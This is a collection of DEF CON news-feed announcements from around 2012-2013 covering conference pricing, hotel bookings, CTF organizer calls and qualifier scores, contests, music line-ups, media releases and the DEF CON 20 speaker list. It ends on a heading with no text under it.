https://www.defcon.org/defconrss.xml We have a new page up for you DEF CON badge tinkerers out there, The DEF CON Badge page! It has links to some of the mods people have done, badge firmware, the puzzle game walkthroughs, and threads from the Parallax Forums dealing with getting started. It also has a handy link to HackerStickers.com, where you can purchase more badges to control and power your diabolical plots, gear up a workshop at your local DEF CON Group or Hackerspace, or just pick one up for posterity! For now it has the DEF CON 20 badge, but we are hunting down resources for the past badges as well, so keep your eyes on it for updates! Happy badge hacking!

==> Want to Help?

https://www.defcon.org/defconrss.xml Do you want to help at DEF CON? Do you want to see other people have a good time and learn the ropes, willing to run around the convention like a gopher? You gotta start somewhere, consider applying with Highwiz for a position helping out with DC 101. https://forum.defcon.org/showthread.php?t=13193

==> The DEF CON FAQ has been updated!

https://www.defcon.org/defconrss.xml Check out https://www.defcon.org/html/links/dc-faq/dc-faq.html This year DEF CON 21 will be $180, instead of $200 like last year, sticking to what Dark Tangent said about the price increase for 20 being temporary. The CFP will be opening at the end of the month so start planning your research!

==> Run the DEF CON CTF!

https://www.defcon.org/defconrss.xml Calling all hacker groups! Only one month left to put in your applications to be the next DEF CON Capture the Flag Organizers! Do you want the fortune, glory, and challenge of running the DEF CON CTF competition? Check out the call at https://forum.defcon.org/showthread.php?t=13160!

==> Reserve a Room for DEF CON 21!

https://www.defcon.org/defconrss.xml Just for you early planners, the DEF CON 21 room reservation link is now live! The current rates start at $104 Sun-Thurs and $118 Fri-Sat. You can also call 1-888-746-6955 and reference group# SRDEF13. Get that room squared away, space is not unlimited!

==> A Call from DC4420

https://www.defcon.org/defconrss.xml A message from our friends at dc4420.org, Subject: DC4420 - 2013 CFP Hey! I know it's a bit late, but Happy New Year! I've posted the dates for 2013 meetings on dc4420.org but you'll notice there is very little else! That's because we still need talks! For those that are yet to join us for our monthly gathering, the format is we meet in a private room in a pub, we have a 1 hour talk and a 20 minute talk on *any subject*, but hopefully something that is interesting to the 'hacker' community.... in the past we've had everything from reverse engineering Windows DEP to building your own Thermic Lance, so when I say any subject, I really do mean any subject that is either interesting or amusing or preferably both... You will be speaking to a small crowd (normally between 60 and 100), so if you want to practice a talk that you're thinking of submitting to a 'real' conference, or you've already given it somewhere that a small section of London is unlikely to have attended, or you have an idea that you can cover in just 20 minutes and never really thought of turning it into a talk, or you've never done any public speaking before then this is the place... you will be most welcome and someone may even buy you a nice warm beer! We have the one-hour slot filled for January, but all others are currently open so don't be shy - send your submission to talks@dc4420.org... All other details are here: http://dc4420.org/ I hope to see you there! Cheers, MM

==> DEF CON Groups on Facebook!

https://www.defcon.org/defconrss.xml Interested in the DEF CON Groups? Blakdayz has fired back up the DEF CON Groups Facebook page, and it's a great place for updates and announcements on what is going on with the DCG scene in general. Also recently updated are the General FAQ and the POC FAQ as well as the Domestic DCG listing. International groups should be updated soon! So have a look, and learn about DEF CON Groups in your area!

==> DEAF CON?

https://www.defcon.org/defconrss.xml Discussions like this are what makes the DEF CON community great, and often lead to the kind of innovative solutions you can only get from our attendees! Any ideas? From Deviant Ollam on the DEF CON Forums: ...I know for a fact that I'm not the only hacker with deaf friends, family, loved ones, etc. How many of you have deaf or hard-of-hearing people in your lives who might want to experience DEF CON? What I am proposing in this thread is not a segregated or special area of any kind, a la DEF CON Kids, but simply I'm sort of putting out the call that "if you know deaf people who have thought about coming to DEF CON before, let's all try to make 2013 the year that they DO come for sure!" Read on at: https://forum.defcon.org/showthread.php?t=13183

==> DEF CON Documentary Sneak Peek!

https://www.defcon.org/defconrss.xml This is a look at what's to come when DT releases the full documentary in a couple months. This should get you excited for what's to come! Check out https://media.defcon.org/ The links for downloading the 20 minute preview in 720p and 1080p with both bittorrent and eMule are right at the top under the hacker documentary section. As usual please keep seeding the files to help out your fellow hackers!

==> CTF Call for Organizers Reminder

https://www.defcon.org/defconrss.xml Does your group have what it takes to be the new DEF CON Capture the Flag Organizers? There are still a couple of months left to apply, the call ends Feb 28, 2013. Instructions on how to apply at: https://forum.defcon.org/showthread.php?t=13160

==> Cyber Monday Sale at Hackerstickers.com!

https://www.defcon.org/defconrss.xml DEF CON & Cyber Monday Sale - Check out the special savings (Up to 60% OFF) site-wide on HackerStickers.com! Use coupon code 'FREESTICK' for free sticker with purchase!

==> DEF CON 20 P2P Collections of Speeches!

https://www.defcon.org/defconrss.xml Happy Turkey Day! As a special Thanksgiving treat, we have posted eMule Collections and Torrents of the complete Audio and Slides Video Collections from DEF CON 20! You can find the links at https://media.defcon.org/index.html#dc20. Leech away and give thanks for all that hacking goodness!

==> DEF CON 20 Slides Video and Audio is Live!

https://www.defcon.org/defconrss.xml The long-awaited moment has arrived, and you can now grab all of the DEF CON 20 Video (slides only) and Audio presentations from the DEF CON 20 Archive page! We have also posted a Slides Video RSS and an Audio RSS for those who prefer to grab them that way! We will soon be posting Torrent and eMule links for the complete collections at media.defcon.org Enjoy!

==> Call for CTF Organizers!

https://www.defcon.org/defconrss.xml The call for new DEF CON Capture the Flag organizers is live on the forums! Does your group have what it takes to carry the torch with the infamous DEF CON CTF? https://forum.defcon.org/showthread.php?t=13160

==> DEF CON 20 Artwork for Download!

https://www.defcon.org/defconrss.xml If you enjoyed the artwork at DEF CON 20 on the floors, signs, swag and elsewhere, we have put together a little package for you! It contains high res jpg files and is free for personal, non-commercial use! Print it out for your walls, make some computer wallpapers and enjoy! You can find it at: DEF CON 20 Hacking Conference Art (Zip file) Keep an eye out for more art from past DEF CONs in the future!

==> DEF CON 20 Hacker Pyramid and Hacker Jeopardy Video!

https://www.defcon.org/defconrss.xml We now have, for your viewing delight, video from Hacker Jeopardy and 10k Hacker Pyramid at DEF CON 20! This year's Hacker Jeopardy was Winn's last, so check out all the surprises he had in store! Enjoy! Hacker Jeopardy: eMule | Torrent Hacker Pyramid: eMule | Torrent You can also download them individually: DEF CON 20 Hacking Conference - Hacker Jeopardy 1 DEF CON 20 Hacking Conference - Hacker Jeopardy 2 DEF CON 20 Hacking Conference - Hacker Jeopardy 3 DEF CON 20 Hacking Conference - Hacker Jeopardy Final DEF CON 20 Hacking Conference - Hacker Pyramid 1 DEF CON 20 Hacking Conference - Hacker Pyramid 2

==> DEF CON 20 Updated DVD!

https://www.defcon.org/defconrss.xml We've updated the DEF CON 20 DVD with some extra stuff! Updated presentation materials are now on the DVD image, as well as badge firmware, and the missing textfiles in the Extra Bonus Features section! Direct Download (4.5GB)

==> DEF CON 20 SE CTF Report!

https://www.defcon.org/defconrss.xml Social-engineer.org has released a detailed report of the findings from DEF CON 20 Social Engineering CTF Battle of the SExes! http://www.social-engineer.org/?p=3106

==> Tamper Evident MacGyvers!

https://www.defcon.org/defconrss.xml The following YouTube video is a pretty awesome show of ingenuity, by one of the Tamper Evident Contest teams in the MacGyver category at DEF CON 20. Using only items in their hotel room, they attempt to defeat a number of tamper evident devices. Enjoy! http://www.youtube.com/watch?v=MUzPwXPzfHQ

==> DEF CON Behind the Scenes: Zebbler Encanti Decor!

https://www.defcon.org/defconrss.xml Cool video on the making of DEF CON 20 decor for the music events! http://vimeo.com/49428863

==> CTF Archives updated for DEF CON 20!

https://www.defcon.org/defconrss.xml Capture the Flag at DEF CON is a legendary contest of hacking skill, and has grown considerably over the past few years. 20 teams competed for the coveted title this year, and we've updated our CTF Archive page to include as many write-ups from the competition and qualification rounds as we could find. We've also included torrents of the raw pcaps and system image from the DEF CON 20 CTF team ACME PHARM on media.defcon.org, courtesy of @phaktor! These resources and write-ups are meant to not only preserve CTF history, but allow you to dig in and see what the contest is all about! Enjoy!

==> DEF CON 20 Music Compilation Release!

https://www.defcon.org/defconrss.xml Those that were at DEF CON 20 received a music CD along with the Con DVD. This music compilation featured incredible tracks by some extremely talented artists, written especially for this year's show. We have now teamed up with Gravitas recordings to release the music comp as a digital download for free, or pay what you want, with all proceeds to benefit the EFF! Here is the Press release from Gravitas:
For Immediate Release
Contact: John@40HzMedia.com
Gravitas Presents DEF CON Compilation Free Download ft. Mochipet, MC Frontalot, Minibosses, Cryptex, and more!
File Under: Electronic / Rap / Glitch Hop
Release Date: August 2nd, 2012
Downloadable MP3s: Please feel free to
Various Artists - DEF CON XX Compilation
DEF CON, one of the world's largest and longest running hacking conferences, celebrates its 20th year with an energetic and appropriately themed compilation, entitled "XX". Founder and head of the conference Jeff Moss, also known as Dark Tangent, tasked DEF CON "goon" and Muti Music artist Great Scott with curating the talent filled track selections; acknowledging that music can be pure hacker fuel. Glitch-hop producers AMB, Mochipet and Cryptex play alongside a myriad of other genre-gurus - including nerd-rockers Minibosses, tech-electro wizard High Sage, and nerdcore rap professionals MC Frontalot and Dual Core. Listening to this mix of hacker artists is like riding a wave of concentration as you find yourself zoning out to the ambient tones or letting the determining beats direct your fingers across the keyboard.
One hundred percent of the proceeds from the sales go to the Electronic Frontier Foundation, a non-profit agency that advocates digital rights and fights for the first amendment against egregious government bills like SOPA and the Cybersecurity Act of 2012. We urge you to purchase the DEF CON XX Compilation and spread the word to your friends and family. Release artwork by DEF CON resident artist: Neil Kronenberg. Tracklist: 1. AMB - On the Run 2. Minibosses - Sports!!! 3. Dale Chase - SSH to Your Heart featuring Shannon Morse 4. Zebbler Encanti Experience - Data Mind 5. MC Frontalot - Secrets From the Future (Crimson Death Remix) 6. Mochipet - Domo's Bass Station 7. ytcracker - Hacker War 8. Great Scott - gr33tz 9. Royal Sapien - In Chicago in the Time of the Fair (Royal Sapien fork for DEF CON XX) 10. REGENERATOR - Slave (DEF CON Discipline Mix by Mach) 11. Dual Core - Fear and Chaos 12. Cryptex - Error 13. High Sage featuring Katy Rokit - Stuck on Ceazar's Challenge (KEW QEIMYUK QEIMYUK QEIM AYM) 14. bil bless - grimjaw (the hunt for the) Cover Art: http://40hzmedia.com/images/dc20-album-art.jpg Links: http://gravitasrecordings.com/ https://www.facebook.com/gravitasrecordings http://www.defcon.org/ Download/Stream Widgets: http://gravitasrecordings.bandcamp.com/album/DEF CON-xx-compilation

==> Let the Updates Begin!

https://www.defcon.org/defconrss.xml Greetings all! That was quite an event, wasn't it? We here at DEF CON HQ and our staff all around the country and the world are still reeling. Now that we've had a minute to catch our breath, we'll start posting all of the contest results, media, press, and more that have come out of DEF CON 20. Let's start with a round-up of some of the news that came from this year's show. We've also started receiving contest results. Keep an eye peeled for more updates in the coming days and weeks!

==> Thanks, Everybody!

https://www.defcon.org/defconrss.xml DEF CON 20 is winding down, and it's been another great show. Thanks to everyone who took time out of their summer to attend, whether you're an old-timer or someone here for your first time. It takes a lot of dedicated people to pull off an event of this magnitude, and I want to take a moment to officially thank the crew that made this for you. Show 'em a little love - there's no better team anywhere.

==> DEF CON 20 Entertainment Schedule is Now Live!

https://www.defcon.org/defconrss.xml Dope beats are essential to a healthy immune system and a sparkly brain. FACT. Information retention is vastly increased by combining DJ sets with contained bodies of cool, chlorinated water. FACT. The entertainment schedule for DEF CON 20 is up for your perusal, and it's pretty packed. There are tons of bands, DJs and even an area to just chill and rest your weary neocortex. Music until the wee hours, from Thursday through Sunday. You can check out Minibosses, or Frontalot, or REGENERATOR or Mochipet. It's like one of those outdoor music festivals, but with enough sense to come inside. Face it. Where else do you get to see Keith Myers versus Zack Fasel in a battle of hacker DJs? Or a band composed entirely of DEF CON Goons? Or the ever-awesome Miss DJ Jackalope rocking the same party as Crystal Method? As always, planning is key - so go check out the schedule and schedule in your Recommended Daily Allowance of rhythm

==> DEF CON Swag Has a New Online Home - Welcome Hackerstickers.com!

https://www.defcon.org/defconrss.xml Hackerstickers.com is now the official online retailer of DEF CON merchandise. They carry the whole line, from T-shirts to Zippos. And also stickers. All that and they also carry picksets and a wide variety of caffeine delivery devices. If you're in the market for hacker swag, check out Hackerstickers. Tell 'em DEF CON sent ya.

==> DT's Tamper Evident Contest is Live!

https://www.defcon.org/defconrss.xml The world is full of 'tamper-proof' packaging. You're expected to trust it, but how strong are those measures, really? This is a contest about defeating these physical measures in a documentable, elegant fashion that leaves no trace of your attack. You can enter alone or with a team, and you can even enter the 'Unlimited' class that allows you to use any tools or gear you can get your hands on. Registration is open in the Tamper Evident Signup Forum Thread. To learn the rules and get a feel for the contest, go to the Tamper Evident Contest Thread. Space is limited, so if you think this is a contest for you, get yourself signed up!

==> Short Story Contest Winners!

https://www.defcon.org/defconrss.xml Thanks to everyone who participated in this year's Short Story Contest. It's cool to see how much literary talent is bubbling under the surface of the DEF CON community. This year's winners are:
- People's Choice Winner - DEF CON Unbound by John McNabb
- First Place - A Silent, Private Place by Davien
- Second Place - DEF CON Unbound by John McNabb
- Honorable Mention - DEF CON - The Beginning of the End by Siobahn Morrison
To read the winning stories, and all of the participants, you can head over to the DEF CON Forums Short Story Contest thread. Congratulations to the winners!

==> DEF CON Art Contest Returns!

https://www.defcon.org/defconrss.xml This year's DEF CON art contest is going to be just a little different. First, you'll only have a few weeks to submit your masterpiece. All entries must be submitted by July 6th. That's a lot less lead time, but we're pretty sure pressure sharpens the mind. The theme is also going to be a little different. Since this is DEF CON's 20th anniversary, we're asking for poster-style artwork that imagines DEF CON 20 years from now. What do you think we'll be sharing with each other at DEF CON 40? What will hackery look like in 2032? You're free to share your vision, whether you tend toward kittens and lollipops or brutal post-human hellscapes. We'll share the best pieces with everyone through Facebook and the DEF CON website, and we'll post the winners in a prestigious spot at the con. So don't be shy - fire up your favorite digital artmaker and give your right brain a workout. Submission Deadline: All submissions must be received by July 6, 2012 Submit entries to: neil [at] defcon dot org Submission info to include: Real name (your identity must be verifiable to collect a prize) and desired nick/handle if any; and a title and description of your piece. Additional Specs: Maximum poster size 11"x17". Final entries should be in 300pi minimum .tif or .jpg format. Vector entries can be in .ai or .eps format. Delivery is the responsibility of the entrant, if the entry is too large to email you may post it online for download. Prizes: Entries will be judged together this year, with prizes for the top three finishers. 1st Place: Two Free admissions to DEF CON 20, and a $200 credit at the DEF CON Swag Booth. 2nd Place: Free admission to DEF CON 20, and a $100 credit at the DEF CON Swag Booth. 3rd Place: Free admission to DEF CON 20, and a $50 credit at the DEF CON Swag Booth.

==> Capture the Packet is Back!

https://www.defcon.org/defconrss.xml "Search Network Traffic, Locate Clues, Solve Puzzles and Score" Capture the Packet returns for a third year, and this time there's a Black Badge up for grabs! You can sign up your team (2 players max), learn the rules and read the FAQ by heading over to the DC20 CTP express sign-up page.

==> CTF Write-up Round-up!

https://www.defcon.org/defconrss.xml As promised, here are some links to write-ups of the past weekend's hot CTF qualification action. The biggest list of links I've seen is at the Deva [Me, Myself and InfoSec] blog. That's a good first stop. A few more links below. * From the VSzA Techblog, write-ups of the grab bag 300 and urandom 300 * From the Security Black Swan blog, a write-up of b 100, b 200 and urandom 300. * If you can read Chinese, Insight Labs has a writeup of Forensics 300 and b 300 If you know of an especially good writeup that's not on the list, let us know on Facebook or Twitter.

==> CTF Quals Results Are In!

https://www.defcon.org/defconrss.xml The CTF qualifications are complete, and it's time to announce the victors. The teams listed below have earned your respect and the opportunity to fight it out in Vegas.
#|Score|Team
1|4900|Hates Irony
2|4800|PPP
3|4400|侍
4|4400|sutegoma2
5|4400|Shellphish
6|4400|TwoSixNine
7|4200|European Nopsled Team (DC 19 winner)
8|4100|More Smoked Leet Chicken
9|4100|our name sucks
10|4100|ACME Pharm
11|4100|WOWHACKER-PLUS
We'll be scouring the Intertubes to bring you write-ups of the action, so watch this space. Thanks to everyone who participated, and congratulations to the winners. The game is afoot.

==> Vote for DC Recognize Awards!

https://www.defcon.org/defconrss.xml DEF CON is proud to announce the 2nd annual DEF CON awards ceremony, renamed the DC Recognize Awards. These awards are given to deserving individuals in the community, industry, and media. For DC20, we've shaken things up and included 7 different categories for your voting pleasure. Nominations will be held online, at SurveyMonkey, until July 10th. From July 11th until the conference, the DEF CON Awards Selection Committee will review all the nominations for validity and evidence. The top group of nominations that meet the nomination criteria, have the best justification, and are generally worthwhile will be presented for voting during the DEF CON Recognize Awards Ceremony at DEF CON. All nominated individuals will be invited to the ceremony to receive their award in person, and provide a short "Thank you!" or "justification". To ensure your nomination is not discarded, include as much vital information as possible for your nomination. Links to stories, articles, media, or other evidence (product information, blogs, etc) should be included. Be sure to attend the DC Recognize Awards Ceremony at DEF CON to vote for your choice in each of the 7 categories! Your hosts again this year will be Jericho, Jeff Moss, and Russ Rogers. You can get your nominations in at the DEF CON Recognize Award Nomination Form!

==> Check Out Our New Vendor Page!

https://www.defcon.org/defconrss.xml The DEF CON Vendor Area never disappoints. There's always an eclectic mix of merchandise to paw through, from cutting-edge reading material to mutant hardware custom-made for the apocalypse. This year we'll be featuring the vendors on a page of their own, so that you can get to know them before the Con. We'll update as the list grows, so keep an eye peeled. Check the DEF CON 20 Vendor Page.

==> Social Engineering CTF Contest for Kids!

https://www.defcon.org/defconrss.xml Running to find the clues... racing to pick the locks, cracking codes, breaking ciphers and frantically fighting against the clock? This is not the theme of the latest Mission Impossible movie. No, this is the theme of the DEF CON 20 Social Engineering Capture the Flag for Kids - Return of the Schmooze. Here is the Cliff's Notes version. If you: * are 6-16 years of age * think outside of the box * enjoy challenges that will test your limits * want to race the clock to solve mind-bending puzzles * want to learn how to pick locks, solve ciphers, break code and use social engineering in your everyday life * enjoy cool prizes This competition will give you all the tools and instruction you need to learn these skills and many more. Although the contest will challenge you, it will be fun, entertaining and very educational. Then you have no choice, grab your parents and head over to the registration page below and fill out all the details. Then it's time to get your brains ready for RETURN OF THE SCHMOOZE! Register Here, NOW!

==> DEF CON 20 Documentary and Call for DEF CON History!

https://www.defcon.org/defconrss.xml As you may have heard, in honor of our 20th anniversary, we have a DEF CON Documentary in the making by none other than Jason Scott of textfiles.com! Jason has made an announcement about it on his blog at ascii.textfiles.com, so go check out what it's all about! Near the end of the post, he asks for your help finding various pieces of DEF CON history, lore and artifacts. So if you have any of the footage or pictures listed, please help him out!

==> DEF CON 20 Speaker Page is Live! First round posted!

https://www.defcon.org/defconrss.xml The first round of Speakers is now live on the DEF CON 20 Speaker Page for your perusal! Enough said, now go and check 'em out! Welcome & Making the DEF CON 20 Badge + Special Presentation by Jason Scott The Dark Tangent, LosT, and Jason Scott DEF CON 101 Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director Jeremy Zerechak Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors Joe Kawasaki, Sidney Sherman, and Actors To Be Announced Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte "MIT Mike" Aponte Owning Bad Guys {And Mafia} With Javascript Botnets Chema Alonso and Manu "The Sur" <ghz or bust: defcon atlas Overwriting the Exception Handling Cache PointerDwarf Oriented Programming Rodrigo Rubira Branco, James Oakley, and Sergey Bratus Tenacious Diggity: Skinny Dippin in a Sea of Bing Francis Brown and Rob Ragan Exploit Archaeology: Raiders of the Lost Payphones Josh Brashars Panel: Meet the Feds Panelists To Be Announced Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement Greg Conti, Lisa Shay, and Woody Hartzog DEF CON Awards Hacking Humanity: Human Augmentation and You Christian "quaddi" Dameff, Jeff "r3plicant" Tully Sploitego - Maltego's (Local) Partner in Crime Nadeem Douba Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework Egypt Post-Exploitation Nirvana: Launching OpenDLP Agents over Meterpreter Sessions Andrew Gavin, Michael Baucom, and Charles Smith More Projects of Prototype This! 
Joe Grand and Zoz Crypto and the Cops: the Law of Key Disclosure and Forced Decryption Marcia Hofmann Black Ops Dan Kaminsky Owning One to Rule Them All Dave Kennedy and Dave DeSimone Detecting Reflective Injection Andrew King An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets James Kirk TBA Moxie Marlinspike Skype VoIP Software Vulnerabilities: Advanced 0Day Exploitation Benjamin Kunz Mejri Defcon Comedy Jam V, V for Vendetta David Mortman, Rich Mogull, Chris Hoff, Dave Maynor, Larry Pesce, and James Arlen Cortana: Rise of the Automated Red Team Raphael Mudge Panel: The Making of DEF CON 20 Hacker + Airplanes = No Good Can Come Of This RenderMan MegaUpload: Guilty or Not Guilty? Jim Rennie and Jennifer Granick Spy vs. Spy: Spying on Mobile Device Spyware Michael Robinson and Chris Taylor Bruce Schneier Answers Your Questions Bruce Schneier Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data Christopher Soghoian, Ben Wizner, Catherine Crump, and Ashkan Soltani Can Twitter Really Help Expose Psychopath Killer Traits? Chris "TheSuggmeister" Sumner Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future Richard Thieme Safes and Containers: Insecurity Design Excellence Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis TBA Paul Vixie

==> Elite Force is Playing DEF CON 20!

https://www.defcon.org/defconrss.xml We have another major addition to the Saturday night DEF CON White Ball music line-up alongside The Crystal Method! DEF-CON is excited to bring renowned breaks+tech-funk act Elite Force to resonate your ears and chest cavity. Recently most well known for his RE:VAMPED series re-working such artists as Aphex Twin, Propellerheads, Meat Katie, Datsik, and many many others, Elite Force has been an established hacker friendly act for years. In fact, you may have heard of him through one of his earlier projects: Lunatic Calm (with the hit song "Leave You Far Behind," featured on movie soundtracks like The Jackal, Mortal Kombat Annihilation, and The Matrix). Official Website: http://www.eliteforcemusic.com/ Soundcloud: http://soundcloud.com/elite-force Videos: 1) Elite Force - Society Suicides: http://www.youtube.com/watch?v=nceAGqfdykQ 2) Elite Force - Captain America: http://www.youtube.com/watch?v=vWkJ7nYE0cU 3) Elite Force - Law of Life: http://www.youtube.com/watch?v=oWnjVRobf0w 4) Elite Force - Mainframe Wrekka: http://www.youtube.com/watch?v=z3d6MMp9Gjk 5) Lunatic Calm - Leave You Far Behind: http://www.youtube.com/watch?v=maP6q3D4Hf0

==> DEF CON Extended Room Block at Rio is almost SOLD OUT!

https://www.defcon.org/defconrss.xml Peak nights Friday and Saturday are almost gone. You can still save money and be at Rio by booking the nights available at our discounted rate and then paying the Rio rate for any nights that are no longer available in our Block. When Friday and Saturday are sold out in our block the Rio rate of 7/27 at $299 and 7/28 at $329 will show up on your reservation. These rates are subject to change based on availability. Or we have rooms at Bally's. Starting on May 4th we will have overflow rooms at Bally's. There is a shuttle between Bally's and Rio that runs all day and into the evening. Rates at Bally's are as follows: Wednesday 7/25 $70.00 Thursday 7/26 $70.00 Friday 7/27 $150.00 Saturday 7/28 $150.00 Sunday 7/29 $70.00 To book at Bally's, use this link: http://www.totalrewards.com/hotel-reservations?propCode=BLV&groupCode=SBDEF2 Or call 1-800-358-8777 and reference group code SBDEF2

==> More Rooms at the Rio!

https://www.defcon.org/defconrss.xml Limited additional room block open at Rio for DEF CON attendees. Save $100.00 per night for the weekend nights! Wednesday night $138.00 Thursday night $158.00 Friday & Saturday nights $178.00 Act now before they are gone! If you made your reservation during the time our block was filling up and you paid a higher rate for one or more nights the Rio has already adjusted your rate to the new current / lower rate.

==> Press Registration for DEF CON 20!

https://www.defcon.org/defconrss.xml Journalists! Want to register as press for DEF CON 20? Check out the new Press Registration page for the rules and how you can apply for a press badge at DEF CON!

==> Reminders and New Pre-con Calendar

https://www.defcon.org/defconrss.xml As DEF CON 20 planning revs into high gear, we thought it might be useful to have a central location for important pre-con dates and deadlines. Enter the Pre-con Calendar, a new page for keeping track of just such dates! Have a look, and if you have a contest or event, with deadlines before con, that could use an entry on the calendar, send it to neil {at} defcon }dot{ org. Check back there frequently for new dates! Here are some of the upcoming dates you may want to remember: * April 15 - Vendor Application Opens * April 30 - Call for Music Closes * May 1 - Contest & Event RFI Closes * May 28 - Call for Papers Closes * June 1-3 - CTF Quals * June 8 - Printed Program Materials Due

==> DEF CON 20 CTF Updates!

https://www.defcon.org/defconrss.xml News from the CTF front! The announcement of the DEF CON 20 CTF Quals was recently announced, and will take place June 1-3, 2012. You can find the details at ddtek.biz! We have another recent qualifying team to announce, team LeetChicken has won the Codegate 2012 YUT Challenge, which automatically qualifies them for DEF CON 20 CTF! Congratulations to them! You can find all kinds of CTF info on the DEF CON 20 CTF Page, and tons of CTF links and write-ups in the CTF Archive!

==> DEF CON 20 Site is Live!

https://www.defcon.org/defconrss.xml If you're looking for a central location for all the latest info on this year's DEF CON, you're in luck! The DEF CON 20 site is now live at https://www.defcon.org/html/defcon-20/dc-20-index.html!

==> 200 for 20

https://www.defcon.org/defconrss.xml We'd like to announce that the price for DEF CON 20 will be $200 USD. What will we do with our ill-gotten gains, you may ask? We're going to make the 20th anniversary of DEF CON one to remember. More special swag, great live music, help for the contests to grow, 20 teams for CTF, special speakers, and numerous other secret stuffs. Believe us when we say it'll be the most epic DEF CON ever! Want to get involved in making DEF CON 20 even more k-rad? Participate on the forums https://forum.defcon.org/

==> The Crystal Method at DEF CON 20!

https://www.defcon.org/defconrss.xml As part of our 20th anniversary celebration, DEF CON is ecstatic to announce the headlining act for our Saturday evening White Ball: The Crystal Method! These guys are pioneers in the electronic music scene, with soundtrack appearances on movies like Spawn, Blade, The Replacement Killers, and many others. Here are some samples to tide you over: Drown in the Now feat. Matisyahu Comin Back Sine Language feat. LMFAO

==> Which Past Shirts Should We Re-print for DEF CON 20?

https://www.defcon.org/defconrss.xml We're thinking of doing a limited run of a few past shirts for sale at DEF CON, but which ones should we do? You can help us decide by checking out the gallery of past shirts on our Facebook page, and then voting for your favorite in our survey also on Facebook, or at: https://www.surveymonkey.com/s/defconshirts

==> Reboot Sneak Preview at DEF CON 20!

https://www.defcon.org/defconrss.xml We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is a peek at the premise from an article on the film: "Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual. In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending zero-hour will bring." We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along with the screening! We'll have more info as this solidifies. If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate as well! Find more info at http://www.rebootfilm.com/scoreboard. Watch the Trailer!

==> Special Music Events at DEF CON 20!

https://www.defcon.org/defconrss.xml Exciting news that is first in a series of many! DEF CON is officially announcing some big musical guests this year, the first of whom is breakcore/glitch/hip-hop all-star Mochipet! You'll be able to catch him at the DEF CON 20 official opening Thursday night pool party! Here are a few examples of Mochipet in action: Whomp-a-saurus bleep Mochipet Godzilla New Year Video by Savage Henry A Milli Girls - Mochipet (pseudo-NSFW)

==> CODE 2600 Showing at DEF CON 20!

https://www.defcon.org/defconrss.xml DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. Like the CODE 2600 Facebook page for more info! About the film: CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught in the grips of a global technology takeover. The Cast: Bruce Schneier, Chief Security Technology Officer, BT Jeff Moss, Founder Def Con and Black Hat Marcus Ranum, Chief Security Officer, Tenable Security Jennifer Granick, Civil Liberties Director, EFF Dr. Bob Lash, Original Member of the Homebrew Computer Club Eric Michaud, Founder, Pumping Station One Gideon Lenkey, Security, CEO RA Security Systems Lorrie Cranor, Cylab, Carnegie Mellon University Phil Lapsley, Phone Phreaking Expert, Author Robert Vamosi, Computer Security Journalist, Author Wallace Wang, Author, "Steal This Computer Book"

==> DEF CON 20 Contest & Events!

https://www.defcon.org/defconrss.xml We wanted to take a minute and point out some of the buzz around contests and events that are brewing on the DEF CON Forums and elsewhere. As you know, LosT @ Con Mystery Challenge will be returning for DEF CON 20, it looks like LosT may or may not already be seeding clues on Twitter (@1o57). The Unofficial DEF CON Shoot is looking pretty active in the planning stages. Other contests and events that have active forums are: 10,000 Hacker Pyramid Capture the Flag Project 2 Scavenger Hunt Schemaverse DEF CON 101 Goon Band Hardware Hacking Village Skytalks Wireless Village HackBus Toxic BBQ So head over to the Forums and see what's up! You can also keep up with all the updates as they occur on the DEF CON Twitter, The DEF CON RSS Feed, and the DEF CON Facebook Page!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml We have a brand spanking new Speaker's Corner for you, where Nikita gives her speaker liaison insight into what makes your CFP submission stand out! A must read for the aspiring or seasoned DEF CON submitter!

==> DEF CON 20 Contest & Event RFI

https://www.defcon.org/defconrss.xml The DEF CON 20 Contest & Event Request for Information is live! If you already run or want to run a contest or event at DEF CON 20, it's where to find all of the info you need to get your contest or event on the map! Check it out at: https://www.defcon.org/html/defcon-20/dc-20-contest-rfi.html

==> Book a Room at the Rio for DEF CON 20!

https://www.defcon.org/defconrss.xml You can now book a room at the Rio for DEF CON 20 at our group rate! Do this one of two ways: Go to http://www.totalrewards.com/hotel-reservations?propCode=RLV&groupCode=SRDEF12, or call the hotel directly at 888-746-6955 and reference group code SRDEF12. The nightly rates are split up as follows: 7/22 through 7/26 is $104 7/27 and 7/28 is $118 Then 7/29 through 7/31 is again $104 Get on it soon! Space is limited!

==> The DEF CON 20 Call for Papers is Open!

https://www.defcon.org/defconrss.xml It's time again, friends, for the DEF CON Call for Papers to Open! Read the CFP announcement and fill out the CFP form to have the chance to present your ninja research at DEF CON's 20th Anniversary!

==> DC20 CTF Announcement!

https://www.defcon.org/defconrss.xml Exciting news regarding the Capture the Flag Competition at DEF CON 20! Check out the announcement here.

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Paul Renda discusses the elements of what could make a successful doomsday worm in this new Speaker's Corner entitled "A Prima On An Internet Doomsday Worm."

==> Merry Christmas from DEF CON! Here's a Special Gift!

